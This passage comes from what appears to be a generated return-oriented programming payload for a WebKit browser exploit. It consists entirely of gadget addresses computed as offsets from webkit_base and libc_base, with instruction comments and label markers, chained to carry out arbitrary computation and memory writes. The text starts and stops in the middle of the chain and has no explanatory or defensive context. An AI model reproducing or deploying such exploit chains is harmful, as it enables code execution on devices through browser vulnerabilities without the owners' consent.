webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+113192, //L1228
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1227:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1228:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+113280, //L1230
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1230:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+113336, //L1231
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1231:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+113440, //L1233
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1233:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1235:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+113560, //L1238
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+113544, //L1236
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1236:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1238:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+113704, //L1241
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+113672, //L1239
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+113688, //L1240
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1239:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1240:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1241:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+113776, //L1243
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1243:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+113832, //L1244
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1244:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+113928, //L1247
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1246:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1247:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1248:
db([25, 0]); // 0x19
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+114024, //L1249
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+114040, //L1250
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1249:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1250:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+114128, //L1252
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1252:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+114184, //L1253
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1253:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+114256, //L1256
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1256:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+114312, //L1257
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1257:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L1259:
libc_base+756002, //mov [rdi], r8
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+114448, //L1260
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1260:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1262:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+114568, //L1265
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+114552, //L1263
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1263:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1265:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+114712, //L1268
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+114680, //L1266
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+114696, //L1267
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1266:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1267:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1268:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+114784, //L1270
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1270:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+114840, //L1271
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1271:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+114936, //L1274
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1273:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1274:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1275:
db([26, 0]); // 0x1a
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+115032, //L1276
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+115048, //L1277
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1276:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1277:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+115136, //L1279
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1279:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+115192, //L1280
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1280:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+115264, //L1283
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1283:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+115320, //L1284
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1284:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L1286:
libc_base+144605, //pop rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+115456, //L1287
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1287:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1289:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+115576, //L1292
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+115560, //L1290
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1290:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1292:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+115720, //L1295
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+115688, //L1293
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+115704, //L1294
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1293:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1294:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1295:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+115792, //L1297
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1297:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+115848, //L1298
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1298:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+115944, //L1301
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1300:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1301:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1302:
db([27, 0]); // 0x1b
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+116040, //L1303
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+116056, //L1304
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1303:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1304:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+116144, //L1306
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1306:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+116200, //L1307
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1307:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+116272, //L1310
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1310:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+116328, //L1311
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1311:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+116416, //L1313
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1313:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1315:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+116536, //L1318
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+116520, //L1316
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1316:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1318:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+116680, //L1321
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+116648, //L1319
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+116664, //L1320
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1319:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1320:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1321:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+116752, //L1323
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1323:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+116808, //L1324
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1324:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+116904, //L1327
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1326:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1327:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1328:
db([1, 0]); // 0x1
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+117000, //L1329
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+117016, //L1330
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1329:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1330:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+117104, //L1332
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1332:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+117160, //L1333
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1333:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+117264, //L1335
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1335:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1337:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+117384, //L1340
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+117368, //L1338
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1338:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1340:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+117528, //L1343
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+117496, //L1341
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+117512, //L1342
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1341:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1342:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1343:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+117600, //L1345
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1345:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+117656, //L1346
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1346:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+117752, //L1349
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1348:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1349:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1350:
db([28, 0]); // 0x1c
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+117848, //L1351
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+117864, //L1352
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1351:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1352:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+117952, //L1354
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1354:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+118008, //L1355
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1355:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+118080, //L1358
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1358:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+118136, //L1359
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1359:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L1361:
webkit_base+12288695, //mov [rdi], r9
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+118272, //L1362
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1362:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1364:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+118392, //L1367
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+118376, //L1365
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1365:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1367:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+118536, //L1370
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+118504, //L1368
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+118520, //L1369
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1368:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1369:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1370:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+118608, //L1372
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1372:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+118664, //L1373
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1373:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+118760, //L1376
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1375:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1376:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1377:
db([29, 0]); // 0x1d
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+118856, //L1378
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+118872, //L1379
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1378:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1379:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+118960, //L1381
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1381:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+119016, //L1382
